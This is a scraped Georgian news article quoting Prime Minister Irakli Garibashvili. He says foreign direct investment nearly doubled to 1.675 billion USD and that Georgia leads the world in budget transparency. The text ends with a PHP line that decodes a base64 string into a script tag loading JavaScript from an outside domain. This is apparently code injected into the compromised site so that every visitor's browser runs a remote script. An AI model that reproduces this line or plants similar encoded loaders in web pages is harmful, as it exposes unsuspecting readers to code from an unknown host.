celsiusi
ავერსი საქკაბელი
ჩვენს ქვეყანაში განხორციელებული პირდაპირი უცხოური ინვესტიციების საერთო მოცულობა გაორმაგებულია, მილიარდ 675 მილიონ აშშ დოლარს შეადგენს, კოვიდამდე პერიოდთან შედარებით კი ეს მაჩვენებელი 70%-ით არის გაზრდილი, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი ღარიბაშვილმა მთავრობის სხდომაზე განაცხადა.
პრემიერ-მინისტრის თქმით, პირდაპირი უცხოური ინვესტიციების გაორმაგებული მაჩვენებელი იმაზე მიუთითებს, რომ ინვესტორები კარგად ხედავენ ქვეყანაში არსებულ სტაბილურ, მშვიდ ვითარებას.
მთავრობის მეთაურმა აღნიშნა, რომ საქართველო ბიუჯეტის გამჭვირვალობის მიხედვით მსოფლიოში პირველ ადგილზეა.
„მინდა, დღეს რამდენიმე მნიშვნელოვანი სიახლე გავაცნო ჩვენს საზოგადოებას. პირველი საკითხი, რაზეც მინდა, ვისაუბრო, არის პირდაპირი უცხოური ინვესტიციების გაორმაგება ბოლო ერთ წელიწადში. კარგად მოეხსენება ყველას, რომ უკრაინაში საშინელი ომი მიმდინარეობს, დაძაბულობაა ყველგან, რეცესია, ევროპაში, ყველგან, მთელი მსოფლიოს მასშტაბით. ამ ფონზე, ჩვენს ქვეყანაში განხორციელდა პირდაპირი უცხოური ინვესტიციები, რომელთა საერთო მოცულობამ შეადგინა მილიარდ 675 მილიონი აშშ დოლარი. ეს არის თითქმის გაორმაგება. ჩვენ თუ ამას შევადარებთ წინა წელს და კოვიდამდე პერიოდს, 2019 წელს მაგალითად, 70%-ით არის გაზრდილი პირდაპირი უცხოური ინვესტიციები. ეს მიუთითებს იმაზე, რომ ინვესტორები კარგად ხედავენ სიტუაციას, რომელიც არის შექმნილი ქვეყანაში.
პირველ რიგში, ეს არის სტაბილურობა, რომელიც ჩვენ შევქმენით, მშვიდობა, სტაბილური პერიოდი, რომელიც ქვეყანაში დგას, გამჭვირვალობა. აქვე მინდა, კიდევ ერთხელ შევახსენო ყველას, რომ საქართველო ბიუჯეტის გამჭვირვალობის მიხედვით არის მსოფლიოში პირველ ადგილზე. ამით ყველაფერია ნათქვამი, თუ როგორი მთავრობა ჰყავს დღეს ქვეყანას, როგორი ხელისუფლება, როგორი პოლიტიკა გვაქვს ჩვენ ზოგადად ბიზნესის, ინვესტორების მიმართ“,- აღნიშნა პრემიერ-მინისტრმა.
307
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");